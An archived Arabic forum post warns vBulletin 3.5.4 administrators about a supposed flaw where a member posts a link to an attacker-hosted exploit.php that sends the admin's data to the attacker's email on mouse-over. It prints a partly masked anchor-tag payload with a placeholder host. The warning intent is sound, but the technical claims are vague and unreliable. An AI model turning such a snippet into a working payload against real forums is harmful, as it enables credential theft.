المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : ثغره vb 3.5.4 جديدة وجب الحذر



Bakenam
04-05-2009, 07:23 AM
السلام عليكم ورحمة الله وبركاته

اخواني الكرام

وانا يالس ابحث في مواقع اجنبية عن ترقيع لبعض الثغرات

انصدمت في ثغرة جديدة واعتقد الكل غافل عنها

المهم انا راح اشرح لكم بعض منها فقط

مثلا عضو سجل في منتداك وشارك كم من مشاركة

راح يكون رافع ملف exploit.php على موقعه ويضع فيه ايميله

المهم راح يروح ويشارك ويضع موضوع وانتبهو من هالكود التاليhttp://traidnt.net/vb/images/smilies/tears.gif


رمز PHP:

<a href="http://YOUR ADDRESS ***.com/IMAGE.GIF" target=******************* **********


المهم راح تستغرب وتقول شوفيها الصورة

ليش مش طالعة
يعني طريقة عمله نفس طريقة عمل ثغرة الفلاش

حبيت انقل لكم الخبر وانبهكم

واتمنى من الجيمع الحذر من هذا الكود

بحيث لو قام المدير بتمرير الماوس

سيقوم الكود بارسال جميع البيانات الى ايميل المخترق

وبالنسبة لي انا هناك تعاون كبير بيني وبين جماعة من الهكر

من اجل اضهار بعض الاشايء والتحذير منها

اللهم اني بلغت

اللهم فاشهد

واسف على الاطالةhttp://traidnt.net/vb/images/smilies/in_love.gif